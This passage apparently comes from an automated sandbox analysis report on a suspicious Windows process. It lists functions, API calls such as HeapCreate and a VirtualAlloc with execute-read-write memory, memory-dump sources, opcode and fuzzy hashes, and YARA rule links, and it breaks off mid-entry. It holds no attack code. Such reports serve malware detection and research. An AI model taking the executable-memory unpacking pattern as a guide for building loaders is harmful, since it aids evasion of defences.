0x0040d55d
0x0040d563
0x0040d559
0x0040d559
0x0040d559

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 00000016.00000002.439507568.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.439543959.0000000000426000.00000040.00020000.sdmp Download File
Associated: 00000016.00000002.439565816.0000000000432000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA0A, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E0040EA0A(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}

0x0040ea0f
0x0040ea11
0x0040ea13
0x0040ea16
0x0040ea1f

APIs

_doexit.LIBCMT ref: 0040EA16

Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4

Memory Dump Source

Source File: 00000016.00000002.439507568.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.439543959.0000000000426000.00000040.00020000.sdmp Download File
Associated: 00000016.00000002.439565816.0000000000432000.00000040.00020000.sdmp Download File

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189

Uniqueness

Uniqueness Score: -1.00%

Function 02636C55, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02636CA6

Memory Dump Source

Source File: 00000016.00000002.441199080.0000000002636000.00000040.00000001.sdmp, Offset: 02636000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 207f9f6737acb089fd28034f64fe9bbc388d1e48e803910831a812a4b0656a8d
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: A6112779A00208EFDB01DF98CA85E98BBF5AF08351F1580A4F9489B361D375EA90DF94

Uniqueness

Uniqueness Score: -1.00%

Function 06B09528, Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b630a1651722feb25a48123354d29124221f9fd83411430afbc1786d75b795c9
Instruction ID: ef786f40f0c9e2cac816a800d4750332b00586ca4f4864dcdc69495ca56751a6
Opcode Fuzzy Hash: b630a1651722feb25a48123354d29124221f9fd83411430afbc1786d75b795c9
Instruction Fuzzy Hash: 6E124170A002099FDB55EF64D484AADBBB6FF84304F14DDA8D5069F3A9DB70AC45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 06B09518, Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d1f55b008ccaeb66bd6ee48fafa0139127b1bea9f019814d24108a4291bace7
Instruction ID: c8a45c585f1e9ab7b5f45a724fb5c23c6ecc666c23968c1db833b0fa187d62c3
Opcode Fuzzy Hash: 6d1f55b008ccaeb66bd6ee48fafa0139127b1bea9f019814d24108a4291bace7
Instruction Fuzzy Hash: 11124F70A00609AFDB55EF60D584AADB7B6FF84304F14CD98D5069F3A9DB70AC46CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 06B083E0, Relevance: .4, Instructions: 430COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aec0eecb86fb6c0f540c53a3b0bf1707033d5b6a5f4f99a498d6affd4d068593
Instruction ID: 7448ea3b85e41fc3e12e7ac92808df33d5d5742541d1e8c21eb5695b73b09531
Opcode Fuzzy Hash: aec0eecb86fb6c0f540c53a3b0bf1707033d5b6a5f4f99a498d6affd4d068593
Instruction Fuzzy Hash: 1CF18B74A002059FDB54DF65D484AAEBFF6FF88314F1588A9E506AB390DB30ED45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06B0E5D0, Relevance: .4, Instructions: 393COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6091c6f60048245c5980dc38c41015e297d5c9dceb076333a4e482dd1bba4d0
Instruction ID: 9774e18a2b12485c16562b4393decbb2c4d33040623e3e87e9ebb8b97061a08e
Opcode Fuzzy Hash: e6091c6f60048245c5980dc38c41015e297d5c9dceb076333a4e482dd1bba4d0
Instruction Fuzzy Hash: 4DD172B4B002019FEF949BB9C454A6EBFE7FFC424471488A9D906DBB95EB70DC028791

Uniqueness

Uniqueness Score: -1.00%

Function 06B01D8B, Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a1f1e65a183853388475d1723e480cd066410d8cf1e143b1d1e4dde67a80985
Instruction ID: 64c4071dff38c96804ba540d075c6ed606fd2bf342647bc29c9f4d1bb8c77354
Opcode Fuzzy Hash: 3a1f1e65a183853388475d1723e480cd066410d8cf1e143b1d1e4dde67a80985
Instruction Fuzzy Hash: E5E11E70E01209DFDB55EFA4D098AADBBF6FF44304F5088A8E5169B3A4DB71AC46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 06B0A4E0, Relevance: .3, Instructions: 340COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7cee0d13a4232247487b09ab3c04ba25daede281b3c42704c2a4543462edee7
Instruction ID: afd0bd871ac65eba04af241177dfdd1e8afcae3299c3d5d34a64adb1e98e1f3a
Opcode Fuzzy Hash: f7cee0d13a4232247487b09ab3c04ba25daede281b3c42704c2a4543462edee7
Instruction Fuzzy Hash: BBD17C70A006099FDB54EF64D584AAEBBF6FF88314F148D68D406AB3A5DB30EC45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06B0B508, Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ceb40f8f5baa3f045b088562c6d28745960fad20f439172b865d1059305c40c
Instruction ID: 9255410e550fe96bc1d95cb65250a011a145882c420baf89c4255ca3be3f6f51
Opcode Fuzzy Hash: 9ceb40f8f5baa3f045b088562c6d28745960fad20f439172b865d1059305c40c
Instruction Fuzzy Hash: 32D15E74A00209AFDB54EF64D580AADFBB6FF84300F14C998D516AB3A4DB30EC46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06B0A9B0, Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af1ad9fd3a559efb16c5651e23bb8080f2b32e1d47ff9c1d590c88fc70028974
Instruction ID: 49400f672831b148814737ab77d15033a51999239ccb5e8254c8845b5eed92d1
Opcode Fuzzy Hash: af1ad9fd3a559efb16c5651e23bb8080f2b32e1d47ff9c1d590c88fc70028974
Instruction Fuzzy Hash: 03A1E370B0030AAFDB65EB75D45067E7BA7EFC0214F148CA8D5069B795DF30AC858B92

Uniqueness

Uniqueness Score: -1.00%

Function 06B04718, Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c92ec1ab4fd930d71bb05ee13ed492520830e8c5fab8d7a0513ef012cf7dacf8
Instruction ID: 0c438a23bcf163fbcfc98f0dd1212a5ac197a89febe3565bdc07a90117edbcff
Opcode Fuzzy Hash: c92ec1ab4fd930d71bb05ee13ed492520830e8c5fab8d7a0513ef012cf7dacf8
Instruction Fuzzy Hash: 73A17074B10204DFE795DF68C054AAEBFE2EF89350B2584A9E905DB3A1DB31EC41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06B01BB8, Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd7e93587c6841d74510658351b41f50ac834ec57adc3131622b7dc62d46dd71
Instruction ID: 5b684d885a47a13e63102f2c3eba060178f189f350dc036e62a5f900a28dea23
Opcode Fuzzy Hash: cd7e93587c6841d74510658351b41f50ac834ec57adc3131622b7dc62d46dd71
Instruction Fuzzy Hash: CB912C70E01209DFDB65EFA8D498AADBFF2EF88300F1445A9E506EB394DB709845CB51

Uniqueness

Uniqueness Score: -1.00%

Function 06B07680, Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63eb832146dcfbf049f048df3b1a453c6714abf9081e73cc2e0fa806dea452b8
Instruction ID: d49abd0f869c2ca19bb6f0df6b049701ff76ffd752893add74c88ad9290059e2
Opcode Fuzzy Hash: 63eb832146dcfbf049f048df3b1a453c6714abf9081e73cc2e0fa806dea452b8
Instruction Fuzzy Hash: AF817F74B002059FEB55DF65D894AAEFFF2EF88344F1484A9E402A7390DB70AC45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06B06378, Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 281276265304ffc6990065187d94990f9718fac6aaca4ea2345e7dffb21c791c
Instruction ID: e392df8659c4e8d00544f16abb4e3eac5e37ede0318a875c04950f2fe2db0b51
Opcode Fuzzy Hash: 281276265304ffc6990065187d94990f9718fac6aaca4ea2345e7dffb21c791c
Instruction Fuzzy Hash: 5D916A78A043049FCB15DFA4D894A6EBBF2FF89301B1089A9E816D7791DB30EC55CB50

Uniqueness

Uniqueness Score: -1.00%

Function 06B04110, Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d665385492a820be4804a417100e84d66f7ec56362b48956af219b2cc46c8efc
Instruction ID: ffceff09aef54d59a74fbda5088f68ac5ab289142242ae4f9b47397b8b836e69
Opcode Fuzzy Hash: d665385492a820be4804a417100e84d66f7ec56362b48956af219b2cc46c8efc
Instruction Fuzzy Hash: 8D514971B08220CFE755DA6CE45076ABFE6EFC525472484BADA05CB380CB32DC42C784

Uniqueness

Uniqueness Score: -1.00%

Function 06B0DD98, Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21f12b93592852f122ca4f8868831bd05b2670df66cb8da09ab46d678c9537ba
Instruction ID: be75d3c554a68b5fe93cf6a2d339ed2c8a26dac0929682aa3115d357ec305423
Opcode Fuzzy Hash: 21f12b93592852f122ca4f8868831bd05b2670df66cb8da09ab46d678c9537ba
Instruction Fuzzy Hash: ED51D074B002019BDB54AFB9D45467FBBEBEFC9294B1484B9E90ACB784EE30DC418791

Uniqueness

Uniqueness Score: -1.00%

Function 06B01740, Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 212aba66401bd9cc7b7a601a3c3bd63c365c166b168aab925f4cc1556bbf28a5
Instruction ID: 30968e3c16ba1a894a005355518dc58d0d978c94a53142eedb74d0413e442a85
Opcode Fuzzy Hash: 212aba66401bd9cc7b7a601a3c3bd63c365c166b168aab925f4cc1556bbf28a5
Instruction Fuzzy Hash: B45155347053048FDB15ABB8D854AAB7FA7EF89354B1484BAE40987791CE30C846CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06B02360, Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81b9f41a627f606691193d56b1753791f154350a98bf310d12b4975f6415d7da
Instruction ID: c0c6fae7013860878e244eef0ab9b7d4f95df1b389e0e88a9cb20aa413c3be79
Opcode Fuzzy Hash: 81b9f41a627f606691193d56b1753791f154350a98bf310d12b4975f6415d7da
Instruction Fuzzy Hash: CB41F670B093846FE7666B74981476F3FA79FC6204F1544EAE546DB2D2DF208C4A83A2

Uniqueness

Uniqueness Score: -1.00%

Function 06B01BA8, Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5adacfd90b28fd745fd4398e6ee0f5011a2e741934adbbbdd7c4749c1a81c8e5
Instruction ID: ac78f2c488bafa71bf1a516e38a518e8d63a430ac3d8c65cdd33d0c337a8fb6a
Opcode Fuzzy Hash: 5adacfd90b28fd745fd4398e6ee0f5011a2e741934adbbbdd7c4749c1a81c8e5
Instruction Fuzzy Hash: FC514C70E01208DFDB69DFA8D498AADBFF6EF84300F1485A9D406AB3A4DB30D845CB50

Uniqueness

Uniqueness Score: -1.00%

Function 06B02388, Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e572b0b34d35c9fa7ef3310943c7256b737d70d8c148d3a3cf4745916c6cde38
Instruction ID: cda89fd3aebfe77d0fc8a1cbd690b07c1e9b5df6503526c7b31241bb6577f7ec
Opcode Fuzzy Hash: e572b0b34d35c9fa7ef3310943c7256b737d70d8c148d3a3cf4745916c6cde38
Instruction Fuzzy Hash: 3541E130B09344AFD725AB78981877E3AE79F86204F6444BDD60ADB781DF318C86C752

Uniqueness

Uniqueness Score: -1.00%

Function 06B0A120, Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7afc1854cd5fe7fe937d2cd84c16f2956bdfd61054871e48a025bc0be2bc32d
Instruction ID: d0eba8d20ad112820f1cd7c8e7ba20eb86b7a0f5521174f8f4d6306d97459b66
Opcode Fuzzy Hash: f7afc1854cd5fe7fe937d2cd84c16f2956bdfd61054871e48a025bc0be2bc32d
Instruction Fuzzy Hash: 95514E70A0070A9FDB50EF64D580AAEB7F6FF84314B14CD69D4469B2A6DB30A845CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 06B03ED8, Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 287f0cec2ac158760457a60fd91087e354be564ee4874d1b1ed89b374c4c35ff
Instruction ID: eaffadc608393d7726babf96c829eeaa1083a90dcc70b5535b2f561125afc22e
Opcode Fuzzy Hash: 287f0cec2ac158760457a60fd91087e354be564ee4874d1b1ed89b374c4c35ff
Instruction Fuzzy Hash: 1C41A3B4B001069FDB55EFA9D85896EBFF6EF84341B108069E906DB390DB30DD01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06B03D30, Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1680536281e1d2f98bc9fd51a2f0c0e358eb2703bea11332583881b5c95d1f1
Instruction ID: efeaae93588facffbd59761e168e95be889b1db9bdb578005b45562eb8da0ef0
Opcode Fuzzy Hash: e1680536281e1d2f98bc9fd51a2f0c0e358eb2703bea11332583881b5c95d1f1
Instruction Fuzzy Hash: 13417F74B00205DFDB15EFA4D4889AEBBF2FF88300B108969E90697394DB31EC52CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06B05B09, Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64321487455c8fb257132a9d473ff1ae116adfe438fab275fa1f8a754d9b3183
Instruction ID: 6c0f5c7eb27886861c0eab3f5ca366b73c6b05e0652e175632b09869593c3975
Opcode Fuzzy Hash: 64321487455c8fb257132a9d473ff1ae116adfe438fab275fa1f8a754d9b3183
Instruction Fuzzy Hash: 1E318D30200A19AFC715EB64E4809AEB3EBFFC12547608E6CD1478B664DF71BC0A8BD5

Uniqueness

Uniqueness Score: -1.00%

Function 06B0A4D1, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56c687bc587d10ab702e9b7f32f8f1d54db98368409059c986e6ba1b45f54082
Instruction ID: d2e7438dcc9c2ee3297399da73ae958957549bbd44fd05eafa2d6860af19dbc9
Opcode Fuzzy Hash: 56c687bc587d10ab702e9b7f32f8f1d54db98368409059c986e6ba1b45f54082
Instruction Fuzzy Hash: 0A31A034A00208DFDB64DF65D554AAE7FBAFF88314F148868D806AB390CB31EC45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06B01AFF, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40b63f761bbfe77ea510c1811b61a39c0d5c509f46dff4529343af66b54099de
Instruction ID: 86eda3379b7eda05af6ab82991b5e207cf77044b9893ad21f006bbf93b4a9ec6
Opcode Fuzzy Hash: 40b63f761bbfe77ea510c1811b61a39c0d5c509f46dff4529343af66b54099de
Instruction Fuzzy Hash: B1317CB5A00204DFDB16EFA9D804BAA7FB6FF85351F0480AAE519CB390D7359911CB50

Uniqueness

Uniqueness Score: -1.00%

Function 06B06C70, Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a719742bfacebe610367a68ae80ba21bf437ccc3196ff9a879df9700f3d8aac0
Instruction ID: faf2a38b0a14c24dfc63978459dc23ffe8e9271f6a3936ec86fc041748780e90
Opcode Fuzzy Hash: a719742bfacebe610367a68ae80ba21bf437ccc3196ff9a879df9700f3d8aac0
Instruction Fuzzy Hash: B021B5757013109BDB259F7AD448A2B7BEAEF89669310447DE90AC7780EE31DC42C750

Uniqueness

Uniqueness Score: -1.00%

Function 06B03D22, Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9446dab6a2cfe48c35480807d24d79996d6552affd03252037b5305289750bf6
Instruction ID: 5bcaaf35891402d517a4df2b04dec80ece8a9710a4e39ee9be04645009f857eb
Opcode Fuzzy Hash: 9446dab6a2cfe48c35480807d24d79996d6552affd03252037b5305289750bf6
Instruction Fuzzy Hash: 3731B474B00205DFDB14EFA4D88896EBBB7FF88300B108999E90697395DB30EC52CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06B0EF90, Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3083322793fc6bf2ab68020a8fa547ac241fe6cccf82330dfecbf8680ea9db5f
Instruction ID: f238e00460477f71f34623cfa89f5743130bcfbc0d59b818ef4390e3d6dbc0fb
Opcode Fuzzy Hash: 3083322793fc6bf2ab68020a8fa547ac241fe6cccf82330dfecbf8680ea9db5f
Instruction Fuzzy Hash: CA2136B2F0D2805FE716D778A458AAA7FA69F872A071944EED445CF781EE60C803C352

Uniqueness

Uniqueness Score: -1.00%

Function 06B08F37, Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d49e104965d0ab7bfe6e55f8e795bfb988d793c34aded6a80b44d94fc4cbfcf2
Instruction ID: 198c884fe909e7d50784e3dd6831c64fa4dd11e9c7e8cf93095907c6210de38b
Opcode Fuzzy Hash: d49e104965d0ab7bfe6e55f8e795bfb988d793c34aded6a80b44d94fc4cbfcf2
Instruction Fuzzy Hash: E3212875B00201DFDB50EF64D485A6ABFAAFF84310F04C8A5E906CB292DB30DD15C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 06B0A4E8, Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24aa5edc01a8a2c10f0a76fbfbf64d7a4a76839b48a2cd171dc8b2b60981de7e
Instruction ID: 8d20e559343ea25c5f4d2df0fd1af713950cf7f0de0e5b4947cf40c2cbde75bf
Opcode Fuzzy Hash: 24aa5edc01a8a2c10f0a76fbfbf64d7a4a76839b48a2cd171dc8b2b60981de7e
Instruction Fuzzy Hash: A6317C34A00209DFDB54DF64E554AADBBF6FF88314F1488A8D406AB3A5CB30AC55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 06B071A0, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afcb486d76f2ac36484348e7d9b353502c752f3da5402760ac565838676bf777
Instruction ID: e0fa63c6fe854fd36cf2a433a5b90a1f369903a8e8acafb5750235360b65a7c4
Opcode Fuzzy Hash: afcb486d76f2ac36484348e7d9b353502c752f3da5402760ac565838676bf777
Instruction Fuzzy Hash: 622122757083809BDB225B78A41467A7FA69FCA355B1440BEEA42CB6C1CF219C468352

Uniqueness

Uniqueness Score: -1.00%

Function 06B06130, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b88dbef69c02fc7fde7bec4be20b3542b4ca34b0e32105ebaa97c8c040fdde7
Instruction ID: 59e10031333ad504c71d1701b81eb986b17fb9fb289d0688710a8d48db5c79de
Opcode Fuzzy Hash: 7b88dbef69c02fc7fde7bec4be20b3542b4ca34b0e32105ebaa97c8c040fdde7
Instruction Fuzzy Hash: 1D21D2307007149BD765EF78D44459A7BAAEF852983208DBCC80A8BB65EF30EC098790

Uniqueness

Uniqueness Score: -1.00%

Function 06B08948, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9d6c037c2d202608f0fca662d33937aa96c9b0dcc8026912465a0e40d46ffe3
Instruction ID: 22e564a64e22dc8e02f1e73454e3148ae091a7ee6584c3744a55dde2d8948b22
Opcode Fuzzy Hash: c9d6c037c2d202608f0fca662d33937aa96c9b0dcc8026912465a0e40d46ffe3
Instruction Fuzzy Hash: 43210574F05328DFDB52ABB894042AE7FF6EB46285B1480F6D905D3780EF348A45C792

Uniqueness

Uniqueness Score: -1.00%

Function 06B07D50, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c934530705dfb4ac41ccdcb41ca5a2cee641dbf997a2b505e62826872bce20f8
Instruction ID: 202ebd95820f7b1d96c6e9f4ab4010ea187f636e482096a3a05e87afcffcb379
Opcode Fuzzy Hash: c934530705dfb4ac41ccdcb41ca5a2cee641dbf997a2b505e62826872bce20f8
Instruction Fuzzy Hash: 8A21C1B9700301ABDB15AF31D49456ABBE7EFC525071085BDD9068B390DF35EC42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06B01688, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11ae2be7d9ac8c9d4ad68172c7f95cf3c82a2aecb9112ee687f10ab9ad42919c
Instruction ID: afafb0fb0a89f0d29e6ab9a048ed3ac5ef660b9c5737caec4cbda942c1edc65a
Opcode Fuzzy Hash: 11ae2be7d9ac8c9d4ad68172c7f95cf3c82a2aecb9112ee687f10ab9ad42919c
Instruction Fuzzy Hash: CD11E432B062156F8719ABB9E81487F7FEAEFC92A531848BDE509D3750DE308C418790

Uniqueness

Uniqueness Score: -1.00%

Function 06B01A97, Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2af0bdf75bd66dabbf410d9401cd7c55b55a6855e6dd5ce4c15dba2082f4f83f
Instruction ID: 95c2967f0ec6585aa1e6fa4e041a54080bcb0e9df71e19f302726d561bb3ed00
Opcode Fuzzy Hash: 2af0bdf75bd66dabbf410d9401cd7c55b55a6855e6dd5ce4c15dba2082f4f83f
Instruction Fuzzy Hash: 9721F535A14248AFCB02DBB4C805AEEBFBAFF89200F0480ABE115D7651D7309905CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 06B0D461, Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 454bf345b47cb83d845d4a32e1b07a6c58ad7217e13d22101b824fe01cf5ad0b
Instruction ID: 74242a00b1bb50ebf76e31188e6071be8cd91342fc21276eb4b83735b8d19e01
Opcode Fuzzy Hash: 454bf345b47cb83d845d4a32e1b07a6c58ad7217e13d22101b824fe01cf5ad0b
